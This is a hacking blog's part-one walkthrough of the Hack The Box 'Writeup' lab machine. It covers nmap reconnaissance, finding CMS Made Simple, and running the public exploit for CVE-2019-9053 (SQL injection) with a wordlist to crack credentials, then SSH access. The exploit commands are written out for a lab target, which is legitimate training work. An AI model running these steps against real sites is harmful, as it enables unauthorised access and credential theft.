SQL Injection Exploitation & Hash Cracking!
Summary
Waddup #InfoSec! In this article I am going to be doing Part 1 of a write-up for Hack The Box’s “Writeup” box! This was a fun one and while I didn’t necessarily learn any new hacking techniques I did build off my previous knowledge of SQL Injection, Hash Cracking, and actually quite a bit regarding how $PATHs work within Linux. #spoilers
As always please feel free to hack along with me as I write these to be very interactive and “step” driven. #HackTogetherHackHarder
Shhhh… You hear that?
#YouKnowWhatTimeItIs! Time for that Reconnaissance phase. We’ll be setting our cross-hairs on 10.10.10.138 once we are successfully VPN’ed into HTBs network. Of course our first step is going to be a basic nmap scan. We are going to use our basic switches:
-sV: This gives us the version of the service running on each port.
-sC: This will use the default NSE scripts which can be useful for additional artifact discovery.
So at first glance pretty standard, we have SSH and HTTP ports open which of course must mean there is a web app running on the box right? →
Now lets see here, what can we gather from just first glance on this page? Well there must be some kind of WAF (Web Application Firewall) in place as they so graciously warned us. Looks like there is a threshold of acceptable 40x errors before the server will ban your IP. In-case you are unfamiliar with HTTP status codes I refer you to the best IT-related cheat sheet I have ever seen… http.cat. TL:DR 40x status codes are always the clients fault such as a bad/invalid request. Thus if we send to many invalid requests to this server looks like WE are getting #ByeFelica’d.
With that knowledge it appears that directory enumeration is out, as that will rack up our limited 40x errors rather quickly. If we take a peek back at the nmap results you can see we were provided some details about the server’s robots.txt file which is disallowing indexing of the /writeup/ directory. Welp let’s make like a tree and go see what potential application and/or web service is running at that URL…
AH! Now it gets interesting, it appears to be someones very very rough blog for HTB writeups. Clicking around there are a few note worthy items we come across. First we see at the footer of each page “Pages are hand-crafted with vim. NOT.”. Now at this point I am unsure if this is some kind of hint or just a reference to the all great Borat…
Other than that I see 2 things that stand out to me:
1. The URLs used for each page look to be a simple SQL query to the backend database which allows the server to easily request & respond with the page contents.
2. Reviewing the source code behind these pages show that the application “CMS Made Simple” is being used as the content management solution.
Weaponization
We now have enough information to at-least attempt to proceed with our hack! Let’s start by checking out what exploits are available to us for the CMS Made Simple application:
Looking at searchsploit we see 1 particular script that stands out. We know that the site may be vulnerable to SQL Injection by noticing how it queries for page contents. And our luck would have it, there's a CMS Made Simple exploit leveraging SQL Injection #jackpot.
So lets copy this script over to our directory and crack it open to take a look at what it’s doing. You can use the following searchsploit command to copy the script over to your current directory:
searchsploit -m exploits/php/webapps/46635.pyThe script is pretty long so to save time and to not bombard you with a wall of code I will just link to it here. And for your reference this script is an exploit for the CVE-2019–9053 vulnerability!
If you read through the code you will see that sure enough this injects SQL commands into the URL to pull any and all data it can. Specifically looking for the Salt being used, username, password, and email account. And the great thing about this script is no modifications needed! Although I still strongly recommend you read through every line of code as you ALWAYS want to have a good understating of what your script does before firing it. Otherwise it could get you into some trouble.
With that said, all we need to run this script against our vulnerable target is some arguments! It’s specifically looking for our target, and what wordlist we would like to use. If you are hacking away at this box in Kali then good news is you have your pick of wordlists from the /usr/share/wordlists directory. Here is the command that we are going to use:
python exploit.py -u http://10.10.10.138/writeup --crack -w /usr/share/wordlists/rockyou.txtAND DRUMROLLLLLL………………………………..
It looks like we mayyyy have our credentials for User shell >:) so let’s give it a try by SSHing in:
#boomski! we now have user shell on the box :) As always it doesn’t stop here! We always aspire to be the #GreedyHacker and aren’t finished until we pop root, buttttt we’ll cover that process in the next writeup!
If you made it this far then I sincerely appreciate you reading and hacking along! Feel free to give me a shout on Twitter @PettyHacks or comment below what you thought and possibly what you’d like to see in the future! #ByeFelica!
